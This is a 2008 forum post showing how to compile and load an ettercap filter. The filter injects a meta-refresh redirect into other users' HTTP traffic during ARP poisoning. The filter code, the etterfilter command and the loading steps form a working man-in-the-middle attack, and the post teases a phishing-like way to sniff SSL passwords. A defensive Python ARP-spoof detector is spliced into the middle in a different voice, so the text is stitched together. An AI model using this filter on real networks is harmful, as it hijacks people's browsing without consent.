
Ettercap Update


Well, it happens to the best of us: I wrote a lot about writing the actual filters, and what they can do, but never told you how to compile/use them (oops). So, let’s take this quick and easy example of a filter I wrote:

Code:
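# Match HTTP responses: TCP packets whose source port is 80
if (ip.proto == TCP && tcp.src == 80) {
   # Insert a zero-delay meta refresh after the opening head tag (both cases)
   replace("<HEAD>", "<HEAD><META http-equiv=\"refresh\" content=\"0;URL=http://tazforum.thetazzone.com/index.php\">");
   replace("<head>", "<head><META http-equiv=\"refresh\" content=\"0;URL=http://tazforum.thetazzone.com/index.php\">");
   # Shown in ettercap's message window when the filter fires
   msg("redirect success\n");
}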

Let’s say we wrote this in gedit (Notepad for you Windows folk); we need to save it! We save it for the time being as redirect.filter. Now, in its current state it’s a load of hoopla that ettercap can’t use, so let’s change that. We need to use a program that came with ettercap called “etterfilter”. Find this program in your installation directory if you are on Windows, and paste redirect.filter into that directory (makes life easier). Now open up a command line and navigate to that directory, by doing something like:

Code:
c:/> cd /program files/ettercap/bin? (don’t know where it is on windows, if someone tells me, I can fix this)

**now we use etterfilter**

?> etterfilter redirect.filter -o redirect.ef

**we have now created a file that ettercap can use, a .ef file **

Now, to actually put this filter into use, we are going to use a pretty similar process to the plugins. Open up ettercap, select your sniffing device, scan for some hosts, and go about arp poisoning just as you normally would.

Here is where it differs! Before you select start sniffing, go to the top bar and select filters, ‘load a filter.’ Find whatever .ef file you are going to use (haven’t tried more than 1 at a time yet, I’ll update), and select it. Now you can start sniffing. If the filter works, when someone tries to go to a new webpage, they will get farked, and the message “redirect success” (in this example) will be shown in the info box.
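The filter only acts on traffic once ARP poisoning has put the sniffing host in the path, and on a poisoned machine the gateway's IP and the sniffing host's own IP resolve to the same MAC. The following is an added example, not part of the original post, that parses `ip neigh` / `arp -a` style output and flags that condition; the sample table, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# IPv4 + MAC (colon or dash) on one line: `ip neigh`, `arp -an`, Windows `arp -a`.
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MAC_RE = re.compile(r"\b([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})\b")
IGNORED = {"ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"}  # broadcast / empty

# Constructed sample (`ip neigh` format): .1 is the gateway, .77 is unresolved.
SAMPLE = """\
192.168.1.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.40 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE
192.168.1.77 dev eth0  FAILED
"""

def parse_neighbours(text):
    """Return {ip: mac}; lines without both an IPv4 address and a MAC are skipped."""
    table = {}
    for line in text.splitlines():
        ip, mac = IP_RE.search(line), MAC_RE.search(line)
        if ip and mac:
            norm = mac.group(1).lower().replace("-", ":")
            # Drop broadcast and IPv4-multicast (01:00:5e) pseudo-entries.
            if norm not in IGNORED and not norm.startswith("01:00:5e"):
                table[ip.group(1)] = norm
    return table

def shared_macs(table):
    """MACs claimed by several IPs. Multi-homed hosts and proxy ARP also do this,
    so treat a hit as a lead to verify, not proof."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {m: sorted(ips) for m, ips in by_mac.items() if len(ips) > 1}

def check(text, gateway_ip, pinned_gateway_mac=None):
    """Findings for one snapshot; pinned_gateway_mac is a value recorded earlier."""
    table, findings = parse_neighbours(text), []
    gw = table.get(gateway_ip)
    if pinned_gateway_mac and gw and gw != pinned_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} is at {gw}, expected {pinned_gateway_mac.lower()}")
    for mac, ips in shared_macs(table).items():
        findings.append(f"{mac} answers for {', '.join(ips)}")
    return findings

if __name__ == "__main__":
    for finding in check(SAMPLE, "192.168.1.1", "08:00:27:11:22:33"):
        print("ALERT:", finding)
```

Feed it the live table (for example the output of `ip neigh show`) and record the gateway's MAC while the network is known to be clean, so the pinned comparison has something to compare against.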

I have some more interesting examples to be shown, including a way of sniffing some passwords from SSL’ed sites, basically it’s a lot like phishing. Should be fun :)

posted by jaymill230

admin @ April 15, 2008
